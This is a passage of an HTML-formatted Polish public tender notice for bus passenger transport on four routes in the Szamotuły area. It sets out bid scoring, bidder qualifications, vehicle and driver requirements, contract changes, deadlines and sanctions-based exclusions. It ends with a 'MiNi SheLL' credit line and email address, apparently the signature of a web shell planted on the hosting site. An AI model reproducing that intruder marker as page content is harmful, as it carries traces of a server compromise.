podstawienia pojazdu zastępczego nie może być dłuższy niż 60 minut.<br/>Oferta, która nie będzie zawierała informacji o czasie podstawienia pojazdu zastępczego, otrzyma „0” punktów za to kryterium i będzie uznane, że czas ten będzie wynosił nie dłużej niż 60 minut. Oferta, która będzie zawierała czas podstawienia pojazdu zastępczego powyżej 60 minut zostanie odrzucona jako niezgodna z warunkami zamówienia.<br/><br/>4. Zamawiający dokona wyboru oferty tego z Wykonawców, która uzyska w wyniku oceny najwyższa liczbę punktów. Przyznanie punków poszczególnym ofertom odbędzie się w oparciu o następujący wzór: Ocena oferty = C+T<br/>Obliczenia będą dokonane z dokładnością do dwóch miejsc po przecinku<br/>5. Punkty zostaną przyznane poprzez zaokrąglenie liczb do części setnych.<br/>6. Jeżeli nie można wybrać najkorzystniejszej oferty z uwagi na to, złożono oferty o takiej samej cenie, Zamawiający wezwie Wykonawców, którzy złożyli te oferty, do złożenia w terminie określonym przez Zamawiającego ofert dodatkowych.<br/>7. Realizacja zamówienia zostanie powierzona Wykonawcy, którego oferta uzyska najwyższą ilość punktów.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Procentowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60,00</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> inne. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Czas podstawienia pojazdu zastępczego (T)</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40,00</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 4</p> <p class="mb-0">Art. 109 ust. 1 pkt 8</p> <p class="mb-0">Art. 109 ust. 1 pkt 9</p> <p class="mb-0">Art. 109 ust. 1 pkt 10</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> 1.	W postępowaniu mogą wziąć udział Wykonawcy, którzy spełniają warunki udziału <br/>w postępowaniu dotyczące: <br/>1)	zdolność do występowania w obrocie gospodarczym;<br/>Zamawiający nie określa szczegółowych warunków w tym zakresie.<br/>2)	uprawnienia do prowadzenia określonej działalności gospodarczej lub zawodowej, o ile wynika to z odrębnych przepisów<br/>Zamawiający wymaga wykazania przez Wykonawcę posiadania:<br/>- aktualnej licencji na wykonywanie transportu drogowego osób, o której mowa w art. 5 ust. 1 ustawy z dnia 6.09.2001 roku o transporcie drogowym (tj. Dz. U. z 2013 r, poz. 1414 z późn. zm.);<br/><br/>3)	sytuacja ekonomiczna lub finansowa<br/>	Zamawiający nie określa szczegółowych warunków w tym zakresie.<br/>4)	zdolności technicznej lub zawodowej<br/>a)	Zamawiający wymaga wykazania przez Wykonawcę, że w okresie ostatnich 3 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy – w tym okresie, wykonał, wykonuje, co najmniej 1 usługę polegającą na wykonywaniu obsługi transportu drogowego osób o wartości minimum 100.000,00 zł brutto.<br/>b) Dysponowania odpowiednim potencjałem technicznym oraz osobami zdolnymi do wykonania zamówienia, Warunek ten zostanie spełniony jeżeli wykonawca wykaże, że dysponuje:<br/>Dla linii 1 Przecław:<br/>a) w celu wykonania zamówienia, minimum 1 autobusem: <br/>- z minimum 20 miejsc siedzących w autobusie,<br/>- pojazdy (każdy z nich) nie starsze niż 2006 r.,<br/>- autobusy winny posiadać aktualne, pozytywne badania techniczne.<br/>b) osobami, które będą uczestniczyć w wykonywaniu zamówienia<br/>min. 1 osobą, która będzie pełnić funkcję kierowcy autobusa, posiadającą uprawnienia do kierowania autobusami;<br/>Dla linii 2 Miasto i Gmina - Autobus:<br/>a) w celu wykonania zamówienia, minimum 2 autobusami: <br/>- z minimum 24 miejsc siedzących w autobusie,<br/>- z minimum 30 miejsc stojących w autobusie;<br/>- drzwi automatyczne, sterowane przez kierowcę,<br/>- pojazdy (każdy z nich) nie starsze niż 2006 r. o maksymalnej długości 10,00 mb, niskopodłogowe; <br/>- autobusy winny posiadać aktualne, pozytywne badania techniczne.<br/>b) osobami, które będą uczestniczyć w wykonywaniu zamówienia<br/>min. 3 osobami, które będą pełnić funkcję kierowcy autobusu, posiadającym uprawnienia do kierowania autobusami;<br/>Dla linii 3 Miasto i Gmina:<br/>a) w celu wykonania zamówienia, minimum 1 autobusem: <br/>- z minimum 20 miejsc siedzących w autobusie,<br/>- pojazdy (każdy z nich) nie starsze niż 2006 r.,<br/>- autobusy winny posiadać aktualne, pozytywne badania techniczne.<br/>b) osobami, które będą uczestniczyć w wykonywaniu zamówienia<br/>min. 1 osobą, która będzie pełnić funkcję kierowcy autobusa, posiadającą uprawnienia do kierowania autobusami;<br/>Dla linii 4 Koźle:<br/>a) w celu wykonania zamówienia, minimum 1 autobusem: <br/>- z minimum 20 miejsc siedzących w autobusie,<br/>- pojazdy (każdy z nich) nie starsze niż 2006 r.,<br/>- autobusy winny posiadać aktualne, pozytywne badania techniczne.<br/>b) osobami, które będą uczestniczyć w wykonywaniu zamówienia<br/>min. 1 osobą, która będzie pełnić funkcję kierowcy autobusu, posiadającą uprawnienia do kierowania autobusami; <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">Odpis lub informacji z Krajowego Rejestru Sądowego lub z Centralnej Ewidencji i Informacji o Działalności Gospodarczej, w zakresie art. 109 ust. 1 pkt 4 ustawy, sporządzonych nie wcześniej niż 3 miesiące przed jej złożeniem, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji.</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">a)	odpowiedniego zezwolenia, licencji, koncesji lub potwierdzenia wpisu do rejestru działalności regulowanej, jeżeli ich posiadanie jest niezbędne do świadczenia określonych usług w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania;<br/>b)	wykaz usług wykonanych, a w przypadku świadczeń powtarzających się lub ciągłych również wykonywanych, w okresie ostatnich 3 lat, a jeżeli okres prowadzenia działalności jest krótszy-w tym okresie, wraz z podaniem wartości, podmiotu, dat wykonania i podmiotów na rzecz których usługi zostały wykonane lub są wykonywane, oraz załączeniem dowodów określających, czy te usługi zostały wykonane lub są wykonywane należycie, przy czym dowodami, o których mowa, są referencje bądź inne dokumenty sporządzone przez podmiot, na rzecz którego usługi zostały wykonane, a w przypadku świadczeń powtarzających się lub ciągłych są wykonywane, a jeżeli wykonawca z przyczyn niezależnych od niego nie jest w stanie uzyskać tych dokumentów-oświadczenie wykonawcy, w przypadku świadczeń powtarzających się lub ciągłych nadal wykonywanych referencje bądź inne dokumenty powtarzające ich należyte wykonywanie powinny być wystawione w okresie ostatnich 3 miesięcy; Zamawiający zaleca wykorzystanie Załącznika nr 3 do SWZ.<br/>c)	wykaz osób, skierowanych przez wykonawcę do realizacji zamówienia publicznego, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, uprawnień, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia publicznego, a także zakresu wykonywanych przez nie czynności oraz informacją o podstawie do dysponowania tymi osobami. Zamawiający zaleca wykorzystanie Załącznika nr 5 do SWZ.<br/>d)	wykaz taboru autobusowego dostępnych Wykonawcy usług w celu wykonania zamówienia wraz z informacją o podstawie do dysponowania tymi zasobami-należy załączyć dokumenty potwierdzające ich dysponowanie – umowy zakupu, leasingu, itp. Zamawiający zaleca wykorzystanie Załącznika nr 8 do SWZ.</span> </h3> <h3 class="mb-0">5.8.) Wykaz przedmiotowych środków dowodowych: </h3> Zamawiający nie wymaga złożenia przedmiotowych środków dowodowych. <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> 1. Zamawiający wymaga zatrudnienia na podstawie umowy o pracę przez Wykonawcę lub Podwykonawcę osoby wykonującej wskazane poniżej czynności w trakcie realizacji umowy: tj. osoby wykonujące przewóz osób, na podstawie umowy o pracę w rozumieniu przepisów ustawy z dnia 26 czerwca 1974 r. Kodeks pracy. Wymagane jest, aby umowy o pracę były zawarte co najmniej na czas realizacji umowy. <br/>2. W trakcie realizacji umowy Zamawiający uprawniony jest do wykonywania czynności kontrolnych wobec Wykonawcy odnośnie spełniania przez Wykonawcę lub Podwykonawcę wymogu zatrudnienia na podstawie umowy o pracę osób wykonujących wskazane w ust. 1 czynności. Zamawiający uprawniony jest w szczególności do:<br/>a)	żądania oświadczenia i dokumentu w zakresie potwierdzenia spełniania ww. wymogu i dokonania ich oceny,<br/>b)	żądania wyjaśnień w przypadku wątpliwości w zakresie potwierdzenia spełniania ww. wymogu,<br/>c)	przeprowadzania kontroli na miejscu wykonywania świadczenia.<br/>3. W trakcie realizacji umowy na każde wezwanie Zamawiającego w wyznaczonym w tym wezwaniu terminie Wykonawca przedłoży Zamawiającemu wskazane poniżej dowody w celu potwierdzenia spełnienia wymogu zatrudnienia na podstawie umowy o pracę przez Wykonawcę lub Podwykonawcę osób wykonujących wskazane w ust. 1 czynności w trakcie realizacji umowy:<br/>a) oświadczenie Wykonawcy lub Podwykonawcy o zatrudnieniu na podstawie umowy o pracę osoby wykonującej czynności, których dotyczy wezwanie Zamawiającego. Oświadczenie to powinno zawierać w szczególności: dokładne określenie podmiotu składającego oświadczenie, datę złożenia oświadczenia, wskazanie, że objęte wezwaniem czynności wykonują osoby zatrudnione na podstawie umowy o pracę wraz ze wskazaniem liczby tych osób, rodzaju umowy o pracę i wymiaru etatu oraz podpis osoby uprawnionej do złożenia oświadczenia w imieniu Wykonawcy lub Podwykonawcy;<br/>b) poświadczoną za zgodność z oryginałem odpowiednio przez wykonawcę lub podwykonawcę kopię umowy/umów o pracę osób wykonujących w trakcie realizacji zamówienia czynności, których dotyczy ww. oświadczenie wykonawcy lub podwykonawcy (wraz z dokumentem regulującym zakres obowiązków, jeżeli został sporządzony). Kopia umowy/umów powinna zostać zanonimizowana w sposób zapewniający ochronę danych osobowych pracowników, (tj. w szczególności bez adresów, nr PESEL pracowników). Imię i nazwisko pracownika nie podlega anonimizacji. Informacje takie jak: data zawarcia umowy, rodzaj umowy o pracę i wymiar etatu powinny być możliwe do zidentyfikowania<br/>c) zaświadczenie właściwego oddziału ZUS, potwierdzające opłacanie przez wykonawcę lub podwykonawcę składek na ubezpieczenia społeczne i zdrowotne z tytułu zatrudnienia na podstawie umów o pracę za ostatni okres rozliczeniowy<br/>d) poświadczoną za zgodność z oryginałem odpowiednio przez wykonawcę lub podwykonawcę kopię dowodu potwierdzającego zgłoszenie pracownika przez pracodawcę do ubezpieczeń, zanonimizowaną w sposób zapewniający ochronę danych osobowych pracowników. Imię i nazwisko pracownika nie podlega anonimizacji.<br/>4. Zamawiający ma prawo w każdym okresie realizacji zamówienia zwrócić się do Wykonawcy o przedstawienie dokumentacji zatrudniania wskazanej osoby, natomiast Wykonawca ma obowiązek przedstawić ją Zamawiającemu w terminie 7 dni roboczych od daty otrzymania zawiadomienia.<br/>5. W przypadku uzasadnionych wątpliwości co do przestrzegania prawa pracy przez Wykonawcę lub Podwykonawcę, Zamawiający może zwrócić się o przeprowadzenie kontroli przez Państwową Inspekcję Pracy. <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> IX.	WYKONAWCY WSPÓLNIE UBIEGAJACY SIĘ O UDZIELENIE ZAMÓWIENIA – KONSORCJUM/SPÓŁKA CYWILNA<br/><br/>1.	Każdy z Wykonawców wspólnie ubiegających się o zamówienie składa oświadczenie, o którym mowa Rozdziale VII ust. 1. Dokument ten potwierdza brak podstaw wykluczenia z postępowania w zakresie, w którym Wykonawca zobowiązany jest wykazać brak podstaw wykluczenia z postępowania oraz spełnianie warunków udziału w postępowaniu w zakresie, w którym każdy z Wykonawców wykazuje spełnianie warunków udziału w postępowaniu.<br/>2.	Podmiotowe środki dowodowe, dotyczące braku podstaw do wykluczenia składa każdy z Wykonawców wspólnie ubiegających się o zamówienie. Podmiotowe środki dowodowe dotyczące spełniania warunków udziału w postępowaniu składa odpowiednio Wykonawca/Wykonawcy wykazujący spełnienie warunku na zasadach określonych w Rozdziale VI SWZ.<br/>3.	Wykonawcy ubiegający się wspólnie o udzielenie zamówienia ustanawiają pełnomocnika do reprezentowania ich w postępowaniu, albo reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego. Pełnomocnictwo do pełnienia takiej funkcji, udzielone zgodnie z wymogami ustawowymi, powinno być opatrzone kwalifikowanym podpisem elektronicznym, zaufanym lub osobistym.<br/>4.	Wykonawcy, wspólnie ubiegający się o udzielenie zamówienia, ponoszą solidarną odpowiedzialność za wykonanie umowy. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> 1.	Zamawiający przewiduje możliwość dokonania zmiany zawartej Umowy w przypadku:<br/>1)	wystąpienia okoliczności siły wyższej, takich jak w szczególności: pożar, powódź, niszczące działanie wiatru, gradobicie, uderzenie pioruna, upadek statku powietrznego, które to okoliczności przyczyniłyby się do opóźnienia wykonania świadczenia Wykonawcy – przedłużenie terminu na wykonanie świadczenia Wykonawcy stosownie do przyczynienia się okoliczności siły wyższej do opóźnienia,<br/>2)	niewykorzystania wartości Umowy określonej w § 2 ust. 1 Umowy, w terminie określonym w § 3 ust. 1 – w takim wypadku Zamawiający przewiduje możliwość przedłużenia okresu obowiązywania Umowy na czas określony do 12 miesięcy (jednak nie dłużej niż do wykorzystania wartości Umowy).<br/>3)	zmiany przepisów prawa mających wpływ na realizację Umowy.<br/>2.	Strony postanawiają, iż dokonają odpowiedniej zmiany wynagrodzenia w wypadku wystąpienia którejkolwiek ze zmian przepisów wskazanych w art. 436 pkt 4 lit. b) Pzp, tj. zmiany:<br/>1)	stawki podatku od towarów i usług oraz podatku akcyzowego,<br/>2)	wysokości minimalnego wynagrodzenia za pracę albo wysokości minimalnej stawki godzinowej, ustalonych na podstawie ustawy z dnia 10 października 2002 r. o minimalnym wynagrodzeniu za pracę,<br/>3)	zasad podlegania ubezpieczeniom społecznym lub ubezpieczeniu zdrowotnemu lub wysokości stawki składki na ubezpieczenia społeczne lub ubezpieczenie zdrowotne,<br/>4)	zasad gromadzenia i wysokości wpłat do pracowniczych planów kapitałowych, o których mowa <br/>w ustawie z dnia 4 października 2018 r. o pracowniczych planach kapitałowych (Dz. U. poz. 2215 oraz z 2019 r. poz. 1074 i 1572),<br/>- jeżeli zmiany te będą miały wpływ na koszty wykonania zamówienia przez wykonawcę<br/>3.	Zmiana wysokości wynagrodzenia, o której mowa w ust. 2, obowiązywać będzie od dnia wejścia w życie zmian, o których mowa w ust. 2, zgodnie z załączoną uprzednio przez Wykonawcę kalkulacją kosztów oraz określoną niżej dokumentacją.<br/>4.	W wypadku zmiany, o której mowa w ust. 2 pkt. 1) w zakresie zmiany stawki podatku VAT, wartość netto wynagrodzenia Wykonawcy nie zmieni się, a określona w aneksie wartość brutto wynagrodzenia zostanie wyliczona na podstawie nowych przepisów.<br/>5.	W wypadku zmiany, o której mowa w ust. 2 pkt. 1) w zakresie zmiany stawki podatku akcyzowego, wynagrodzenie Wykonawcy ulegnie zmianie o wartość wzrostu całkowitego kosztu wykonania przez Wykonawcę zamówienia wynikającą ze zmiany stawki podatku akcyzowego.<br/>6.	W przypadku zmiany, o której mowa w ust 2 pkt. 2) wynagrodzenie Wykonawcy ulegnie zmianie o wartość wzrostu całkowitego kosztu wykonania przez Wykonawcę zamówienia wynikającą ze zwiększenia wynagrodzeń osób bezpośrednio wykonujących zamówienie do wysokości zmienionego minimalnego wynagrodzenia, z uwzględnieniem wszystkich obciążeń publicznoprawnych od kwoty wzrostu minimalnego wynagrodzenia (przy uwzględnieniu proporcji wynikającej z udziału tych osób w wykonaniu wszystkich zamówień realizowanych przez Wykonawcę).<br/>7.	W przypadku zmiany, o której mowa w ust 2 pkt. 3) lub 4), wynagrodzenie Wykonawcy ulegnie zmianie <br/>o wartość wzrostu całkowitego kosztu wykonania przez Wykonawcę zamówienia, jaką będzie on zobowiązany dodatkowo ponieść w celu uwzględnienia tej zmiany, przy zachowaniu dotychczasowej kwoty netto wynagrodzenia osób bezpośrednio wykonujących zamówienie na rzecz Zamawiającego (przy uwzględnieniu proporcji wynikającej z udziału tych osób w wykonaniu wszystkich zamówień realizowanych przez Wykonawcę).<br/>8.	Wprowadzenie zmian wysokości wynagrodzenia wymaga uprzedniego złożenia przez Wykonawcę oświadczenia o wysokości dodatkowych kosztów wynikających z wprowadzenia zmian, o których mowa w ust 2 pkt. 2.), 3) lub 4). <br/>cd. w projekcie umowy par 14 <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2022-12-12 09:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">platformazakupowa.pl/pn/szamotuly</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2022-12-12 09:30</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2023-01-10</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IX – POZOSTAŁE INFORMACJE</h2> Zgodnie z art. 1 pkt 3 ustawy w celu przeciwdziałania wspieraniu agresji Federacji Rosyjskiej na Ukrainę rozpoczętej w dniu 24 lutego 2022 r., wobec osób i podmiotów wpisanych na listę, o której mowa w art. 2 ustawy, stosuje się sankcje polegające m.in. na wykluczeniu z postępowania o udzielenie zamówienia publicznego lub konkursu prowadzonego na podstawie ustawy z dnia 11 września 2019 r. – Prawo zamówień publicznych (Dz. U. z 2021 r. poz. 1129, z późn. zm.), zwanej dalej „ustawą Pzp”.<br/><br/>Na podstawie art. 7 ust. 1 ustawy z postępowania o udzielenie zamówienia publicznego lub konkursu prowadzonego na podstawie ustawy Pzp wyklucza się:<br/>1.	wykonawcę oraz uczestnika konkursu wymienionego w wykazach określonych w rozporządzeniu 765/2006 i rozporządzeniu 269/2014 albo wpisanego na listę na podstawie decyzji w sprawie wpisu na listę rozstrzygającej o zastosowaniu środka, o którym mowa w art. 1 pkt 3 ustawy;<br/>2.	wykonawcę oraz uczestnika konkursu, którego beneficjentem rzeczywistym w rozumieniu ustawy z dnia 1 marca 2018 r. o przeciwdziałaniu praniu pieniędzy oraz finansowaniu terroryzmu (Dz. U. z 2022 r. poz. 593 i 655) jest osoba wymieniona w wykazach określonych w rozporządzeniu 765/2006 i rozporządzeniu 269/2014 albo wpisana na listę lub będąca takim beneficjentem rzeczywistym od dnia 24 lutego 2022 r., o ile została wpisana na listę na podstawie decyzji w sprawie wpisu na listę rozstrzygającej o zastosowaniu środka, o którym mowa w art. 1 pkt 3 ustawy;<br/>3.	wykonawcę oraz uczestnika konkursu, którego jednostką dominującą w rozumieniu art. 3 ust. 1 pkt 37 ustawy z dnia 29 września 1994 r. o rachunkowości (Dz. U. z 2021 r. poz. 217, 2105 i 2106), jest podmiot wymieniony w wykazach określonych w rozporządzeniu 765/2006 i rozporządzeniu 269/2014 albo wpisany na listę lub będący taką jednostką dominującą od dnia 24 lutego 2022 r., o ile został wpisany na listę na podstawie decyzji w sprawie wpisu na listę rozstrzygającej o zastosowaniu środka, o którym mowa w art. 1 pkt 3 ustawy.<br/>Powyższe wykluczenie następować będzie na okres trwania ww. okoliczności. W przypadku wykonawcy lub uczestnika konkursu wykluczonego na podstawie art. 7 ust. 1 ustawy, zamawiający odrzuca wniosek o dopuszczenie do udziału w postępowaniu o udzielnie zamówienia publicznego lub ofertę takiego wykonawcy lub uczestnika konkursu, nie zaprasza go do złożenia oferty wstępnej, oferty podlegającej negocjacjom, oferty dodatkowej, oferty lub oferty ostatecznej, nie zaprasza go do negocjacji lub dialogu, a także nie prowadzi z takim wykonawcą negocjacji lub dialogu, odrzuca wniosek o dopuszczenie do udziału w konkursie, nie zaprasza do złożenia pracy konkursowej lub nie przeprowadza oceny pracy konkursowej, odpowiednio do trybu stosowanego do udzielenia zamówienia publicznego oraz etapu prowadzonego postępowania o udzielenie zamówienia publicznego.<br/>Jako sankcję przewidziano również karę pieniężną nakładaną na osoby lub podmioty podlegające wykluczeniu na podstawie art. 7 ust. 1 ustawy, które w okresie tego wykluczenia ubiegają się o udzielenie zamówienia publicznego lub dopuszczenie do udziału w konkursie lub biorą udział w postępowaniu o udzielenie zamówienia publicznego lub w konkursie. Przy czym, przez ubieganie się o udzielenie zamówienia publicznego lub dopuszczenie do udziału w konkursie rozumie się odpowiednio złożenie wniosku o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia publicznego lub konkursie, złożenie oferty, przystąpienie do negocjacji lub złożenie pracy konkursowej.<br/>Kara pieniężna nakładana będzie przez Prezesa Urzędu Zamówień Publicznych, w drodze decyzji, w wysokości do 20 000 000 zł.<br/>4.	Zamawiający może wykluczyć Wykonawcę na każdym etapie postępowania. Zamawiający odrzuca ofertę, jeżeli została złożona przez Wykonawcę podlegającego wykluczeniu z postępowania.

Creat By MiNi SheLL
Email: jattceo@gmail.com